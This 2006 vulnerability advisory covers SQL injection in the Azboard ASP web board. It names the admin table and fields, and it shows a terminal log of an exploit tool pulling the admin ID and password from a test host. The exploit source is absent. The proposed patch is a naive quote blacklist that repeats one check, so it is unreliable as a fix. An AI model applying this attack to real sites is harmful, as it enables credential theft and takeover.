Title : Azboard <= 1.0 Multiple Sql Injections
Published : 2006.5.14
Author : x90c(정경주)@chollian.net/~jyj9782/
Link : http://user.chol.com/~jyj9782/sec/azboard_advisory.txt
0x01 Summary
Azboard is a web board written in asp (active server pages).
It has a sql injection hole. so we can get the admin(bbs)'s
Id and password and so on. let's start to see what is the code…
0x02 Codes
above lines are vulnerable to sql attak as you can see. y0! ;)~
i found the fields('admin_id', 'admin_pass') and table('board_admin') in this file.
0x03 Exploit
[root@ebp exploits]# ls -al azboard_blue.c
-rw-r–r-- 1 root root 4771 5월 14 23:30 azboard_blue.c
[root@ebp exploits]# ls -al azboard_blue
-rwxr-xr-x 1 root root 17163 5월 14 23:30 azboard_blue
[root@ebp exploits]#
[root@ebp exploits]# make azboard_blue
cc azboard_blue.c -o azboard_blue
azboard_blue.c: In function `tu1':
azboard_blue.c:55: warning: assignment makes pointer from integer without a cast
azboard_blue.c:59: warning: assignment makes pointer from integer without a cast
azboard_blue.c:63: warning: assignment makes pointer from integer without a cast
azboard_blue.c:67: warning: assignment makes pointer from integer without a cast
[root@ebp exploits]# ./azboard_blue
azaboard 1.0 <= 0day :
$ ./azboard_blue <azboard URL> <cate>
~ [email protected]/~jyj9782
[root@ebp exploits]#
[root@ebp exploits]# ./azboard_blue http://192.168.0.5 testbbs
[ LANG=KOR admin id ] admin
[ LANG=KOR admin pass ] 1234
[root@ebp exploits]#
0x04 Patch
~/azboard/list.asp:
…
if instr(search, "\'") > 0 or instr(cate, "\'") > 0 or instr(cate, "\'") > 0 then
Response.redirect "error.asp"
end if
…
Thanks for many 0p3n-H4ck3rz!